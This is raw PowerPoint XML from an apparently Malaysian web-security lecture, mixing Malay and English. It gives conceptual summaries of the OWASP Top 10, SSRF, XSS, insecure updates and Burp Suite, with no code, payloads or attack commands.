        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2237021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48CF0-0588-F0CD-249F-BEE5FBE30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478E1-A0FA-22D2-80E0-09FE9A050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A76B22-F6BC-2422-1374-2D199F0B07D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>A01: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A user can access another user's account by manipulating URL parameters or session cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>A02: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Storing passwords in plain text, using weak encryption algorithms, or improper key management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A03: SQL injection (injecting malicious SQL code into input fields), command injection (injecting malicious commands into input fields).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A04: Building applications without considering security from the start, leading to vulnerabilities like insecure direct object references (IDOR) or broken authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A05: Default configurations on servers, databases, and applications, weak passwords, open cloud storage buckets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A06: Using outdated software with known vulnerabilities, relying on components with known security issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A07: Weak password policies, lack of multi-factor authentication, improper session management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A08: Lack of input validation, improper error handling, missing function level access control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A09: Inadequate logging and monitoring of system activity, lack of intrusion detection systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A10: Exploiting a web application to make requests to internal systems or other external servers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC89E04D-B7E2-4EC3-5EAC-4DF9E21EFF22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111927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D0717-4A6B-A09F-7AC8-88B02F411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C0C13-4C2C-10D5-4B89-FF7E08EB5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A62FDA-BB9B-D8A2-390E-43F1FFE3A61A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>A01: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A user can access another user's account by manipulating URL parameters or session cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>A02: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Storing passwords in plain text, using weak encryption algorithms, or improper key management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A03: SQL injection (injecting malicious SQL code into input fields), command injection (injecting malicious commands into input fields).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A04: Building applications without considering security from the start, leading to vulnerabilities like insecure direct object references (IDOR) or broken authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A05: Default configurations on servers, databases, and applications, weak passwords, open cloud storage buckets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A06: Using outdated software with known vulnerabilities, relying on components with known security issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A07: Weak password policies, lack of multi-factor authentication, improper session management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A08: Lack of input validation, improper error handling, missing function level access control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A09: Inadequate logging and monitoring of system activity, lack of intrusion detection systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A10: Exploiting a web application to make requests to internal systems or other external servers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1805899E-8058-ED17-5BAB-21809684AB7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3737583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783EF-601A-65BA-C634-DBEA362135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C09AC-2BA7-45FA-D188-8B04B1B8E2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F15F59-20AC-3D34-32F8-8D0E575F02B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Insecure Software Updates:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Failing to validate software updates with digital signatures or secure mechanisms.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: A desktop application downloads and installs updates over HTTP instead of HTTPS, allowing attackers to perform a man-in-the-middle attack and inject malicious updates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Use of Untrusted Components:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integrating third-party libraries, plugins, or dependencies without verifying their integrity or authenticity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Including a JavaScript library from a CDN that has been tampered with to include malicious code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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AFCF66F4-85F9-83DC-D9F3-C1887FD14B3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3087840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6CA20-38C1-B5A1-0F55-4740B6CAB1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843710-A8DC-E120-A2AA-210C16B0F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A310A-A10C-C7B0-E10D-8BB0CF0980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94DF4C-398C-91A7-86FB-930A501329BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3905682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D64A3-178D-9A81-B825-7FE2BDA89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63B51-A1E4-664E-5563-879BDCF0A7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36A5B-8444-5969-D172-0EC1B0A7A3A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Definition:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSRF occurs when an application allows an attacker to induce the server to make HTTP requests to an unintended location. This vulnerability can enable attackers to access internal systems, sensitive data, or services that are not directly exposed to the internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>How SSRF Works:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server processes a user-supplied URL or request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server makes a backend request to the provided URL without proper validation or restrictions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker can manipulate this request to interact with internal or external systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D30495DC-DF7D-0293-B022-2B42E94A412D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3170928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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="532388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Burp suite : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bertindak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sebgai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> web application dan web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> duduk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> client dan server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dgn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> burp suite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>boleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> intercept, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>analyse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> dan modify traffic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1865773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request: HTTP Method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>yg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>utk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> request data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get response: response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>drpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> server </a:t>
            </a:r>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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1982749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request: HTTP Method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>yg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>utk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> request data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get response: response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>drpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> server </a:t>
            </a:r>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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1460135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Input field </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>tu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>tak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>divalidate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>/checked/sanitize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> proper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>masukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>biasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> string, attacker boleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>masukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> script/code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS) is a type of security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. When a vulnerable website displays user-provided data without properly sanitizing it, attackers can execute malicious JavaScript in other users' browsers, potentially leading to a range of harmful actions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcAft>
                <a:spcPts val="750"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How does XSS work?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cross-site scripting works by manipulating a vulnerable web site so that it returns malicious JavaScript to users. When the malicious code executes inside a victim's browser, the attacker can fully compromise their interaction with the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1765349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Input field </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>tu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>tak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>divalidate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>/checked/sanitize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> proper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>masukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>biasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
